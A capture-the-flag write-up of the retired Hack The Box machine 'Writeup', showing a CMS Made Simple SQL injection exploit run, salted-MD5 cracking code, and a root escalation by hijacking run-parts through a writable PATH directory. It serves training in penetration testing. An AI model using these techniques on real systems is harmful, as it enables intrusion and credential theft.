Writeup
Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.
Writeup by jkr (10.10.10.138)
Tools used ¶
Recon ¶
Nmap ¶
As usual, we kick off with a Nmap scan.
$ nmap -v -p- -oN scanning/nmap_allports -T4 --append-output 10.10.10.138
Nmap scan report for 10.10.10.138
Host is up (0.028s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Having a look at port 80 ¶
Since port 80 is open, we’ll have a look at the website.

From the homepage we learn that the server is running some DoS protection (Donkey DoS protection). So we’ll probably have to limit the speed of certain automated tools to prevent us from getting banned/blocked.
If you use a tool like Burp or are used to doing some initial recon on web applications, you will probably have noticed that there is a robots.txt file on this website. robots.txt often gives web admins a false sense of security: they list sensitive URLs in it because they don’t want (well-behaved) bots visiting them, but the file itself is public and anyone can read it.
# __
# _(\ |@@|
# (__/\__ \--/ __
# \___|----| | __
# \ }{ /\ )_ / _\
# /\__/\ \__O (__
# (--/\--) \__/
# _)( )(_
# `---''---`
# Disallow access to the blog until content is finished.
User-agent: *
Disallow: /writeup/
Since we aren’t bots, we don’t adhere to the limits of robots.txt and have a look at /writeup/.

While the homepage was hand-crafted with vi, this page apparently isn’t (see the footer).
CMS Made Simple.
You could also have discovered this by looking at the HTML head:
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved.">
Exploiting ¶
Let’s have a look at Exploit-DB for exploits that don’t require authentication (since we don’t have any credentials yet).
“CMS Made Simple < 2.2.10 - SQL Injection” looks promising: an unauthenticated, time-based blind SQL injection (CVE-2019-9053) that extracts the admin’s username, e-mail, salt and password hash.
You’ll have to update the value of the TIME variable in the script, or the Donkey DoS protection will ban your IP. TIME is the sleep() delay the time-based injection uses to tell a true condition from a false one, so raising it also slows down the rate of requests. Changing this value to 5 sufficed in my case.
I ran the script without cracking and copied the cracking code to do the cracking independently because I didn’t have a wordlist ready.
However, you can do the cracking immediately by passing the --crack and -w parameters. Don’t forget to pass the full URL of the CMS Made Simple application, including the /writeup/ path.
$ python exploit.py -u http://10.10.10.138/writeup/ --crack -w /usr/share/wordlists/rockyou.txt
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9
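What the cracking step actually does, as an added example (this is neither the exploit script’s code nor the author’s): CMS Made Simple stores md5(salt + password) as lowercase hex, so every wordlist candidate is prefixed with the recovered salt and hashed, and the first match is the password. The function names and the small candidate lists are made up for this example; the salt and hash are the values the exploit recovered above.

```python
import hashlib


def cms_hash(salt, password):
    """CMS Made Simple stores md5(salt + password) as lowercase hex; this is
    the comparison the exploit's cracking routine performs. The candidate may
    be str or bytes so raw wordlist lines (rockyou.txt is not clean UTF-8)
    can be hashed without decoding them first."""
    if isinstance(password, str):
        password = password.encode("utf-8")
    return hashlib.md5(salt.encode("ascii") + password).hexdigest()


def crack(salt, target_hash, candidates):
    """Return the first candidate whose salted MD5 equals target_hash, or None.
    Line endings are stripped so an open file object can be passed directly."""
    target_hash = target_hash.strip().lower()
    for word in candidates:
        word = word.rstrip(b"\r\n") if isinstance(word, bytes) else word.rstrip("\r\n")
        if cms_hash(salt, word) == target_hash:
            return word.decode("utf-8", "replace") if isinstance(word, bytes) else word
    return None


def crack_wordlist(salt, target_hash, path):
    """Stream a wordlist in binary mode so odd encodings do not abort the run."""
    with open(path, "rb") as f:
        return crack(salt, target_hash, f)


# Values recovered by the exploit above.
SALT = "5a599ef579066807"
HASH = "62def4866937f08cc13bab43bb14e6f7"

if __name__ == "__main__":
    import sys

    wordlist = sys.argv[1] if len(sys.argv) > 1 else "/usr/share/wordlists/rockyou.txt"
    print(crack_wordlist(SALT, HASH, wordlist))
```

The same job in hashcat is mode 20 (md5($salt.$pass)), which expects hash:salt: `hashcat -m 20 62def4866937f08cc13bab43bb14e6f7:5a599ef579066807 /usr/share/wordlists/rockyou.txt`. An unsalted MD5 mode (0) will never match, which is why passing the salt is not optional here.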
Getting the user flag ¶
SSH onto the box with these credentials and get the user flag.
$ ssh jkr@10.10.10.138
jkr@writeup:~$ cat user.txt
d4e493fd4068afc9eb1aa6a55319f978
Going for root ¶
I have to admit I peeked at the HTB forum for this part. And it appears many people have had to.
The reason is that the process that gives the hint towards root only shows up when something happens on the machine: the command below runs when a user logs in, so you need to trigger an SSH login while you are watching the process list.
Mind your $PATH ¶
Upload pspy64 to the machine, launch it, and have a look at the processes and their parameters (log in over SSH from a second terminal while it runs).
Can you spot what’s dangerous in this command?
sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
This command sets a custom $PATH with env -i and then calls run-parts without an absolute path, so the command is resolved by walking that $PATH in order: /usr/local/sbin is searched first, while the real run-parts lives in /bin, the last entry. The job runs as root (root ends up owning anything the script writes) and its output is stored in the MotD (Message of the Day) file, /run/motd.dynamic, which is shown at login.
You can go through each of the directories in this $PATH by hand (ls -ld on each one) or run Linux Smart Enumeration (lse) to find a directory within the path in which we have write permissions.
jkr@writeup:~$ bash lse.sh -l 2 -s fst000
---
If you know the current user password, write it here for better results: raykayjay9
---
User: jkr
User ID: 1000
Password: ******
Home: /home/jkr
Path: /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
umask: 0022
Hostname: writeup
Linux: 4.9.0-8-amd64
Distribution: Devuan GNU/Linux ascii
Architecture: x86_64
============================================================( file system )=====
[*] fst000 Writable files outside user's home.............................. yes!
---
/var/local
/var/lib/php/sessions
/var/tmp
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/src
/usr/local/etc
/usr/local/lib
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin
/home/jkr
/tmp
/tmp/.sw
/tmp/.sw/sw.sh
/tmp/.sw/sw2.sh
---
==================================( FINISHED )==================================
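The check lse performs can be reduced to a few lines. The following is an added example (not lse’s or the author’s code): it resolves a command the way the shell does, walking the colon-separated $PATH in order, and reports every writable directory that is searched before the directory holding the real binary, since a same-named file in any of those shadows the real one for every process using that $PATH. The function names are made up, and build_sample_layout() creates a constructed temporary stand-in for the target’s layout so the code can be run anywhere.

```python
import os
import shutil
import tempfile

# The PATH that the MOTD job sets (from the pspy output above).
MOTD_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def _is_executable_file(p):
    return os.path.isfile(p) and os.access(p, os.X_OK)


def resolve_in_path(path, cmd):
    """Mimic the shell's lookup: first directory in the colon-separated path
    that holds an executable regular file named cmd, or None if not found."""
    for d in path.split(":"):
        d = d or "."  # an empty entry means the current directory
        if _is_executable_file(os.path.join(d, cmd)):
            return d
    return None


def hijack_dirs(path, cmd):
    """Directories searched *before* cmd's real location that the current
    user can write to. If cmd is not found at all, every writable directory
    in the path qualifies, since the lookup would never stop early."""
    writable = []
    for d in path.split(":"):
        d = d or "."
        if _is_executable_file(os.path.join(d, cmd)):
            break
        if os.path.isdir(d) and os.access(d, os.W_OK):
            writable.append(d)
    return writable


def build_sample_layout():
    """Constructed stand-in for the target: an empty, writable usr/local/sbin
    listed ahead of a bin/ that holds the real run-parts. Returns
    (path_string, tmpdir); pass tmpdir to cleanup() when done."""
    root = tempfile.mkdtemp(prefix="pathaudit-")
    local_sbin = os.path.join(root, "usr", "local", "sbin")
    bin_dir = os.path.join(root, "bin")
    os.makedirs(local_sbin)
    os.makedirs(bin_dir)
    real = os.path.join(bin_dir, "run-parts")
    with open(real, "w") as f:
        f.write("#!/bin/sh\nexit 0\n")
    os.chmod(real, 0o755)
    return f"{local_sbin}:{bin_dir}", root


def cleanup(root):
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    # On the target this reports /usr/local/sbin; on other hosts the result
    # depends on that host's permissions.
    print("run-parts resolves to:", resolve_in_path(MOTD_PATH, "run-parts"))
    print("writable dirs searched before it:", hijack_dirs(MOTD_PATH, "run-parts"))
```

Run as jkr on the box this prints /usr/local/sbin for both questions: it is the first entry of the job’s $PATH and it is group-writable for the user, which is exactly what lse’s fst000 line says. Note that os.access() answers for the user running the script, so the audit has to be run as the low-privileged user, not as root.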
Getting the root flag ¶
Since /usr/local/sbin is writable and is the first entry in that $PATH, we can add a script named run-parts there that outputs the content of the root flag file; it shadows the real /bin/run-parts for this job. The output is added to the MotD, which is printed in the welcome message of any user SSHing onto the box. Make sure the script is executable, then log out and log back in, or log in from another terminal (tab).
jkr@writeup:~$ nano /usr/local/sbin/run-parts
#!/bin/bash
ls /root/
cat /root/root.txt
jkr@writeup:~$ chmod +x /usr/local/sbin/run-parts
$ ssh jkr@10.10.10.138
jkr@10.10.10.138's password:
bin
root.txt
eeba47f60b48ef92b734f9b6198d7226
The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You could of course also print the content of the root.txt file into a file in /tmp/. However, make sure you delete that file as soon as you have copied the flag so you don’t spoil it for others. The file will be created by root, so you’ll need to reuse the ‘exploit’ to delete it.
The only way of discovering the limits of the possible is to venture a little way past them into the impossible.
~ Arthur C. Clarke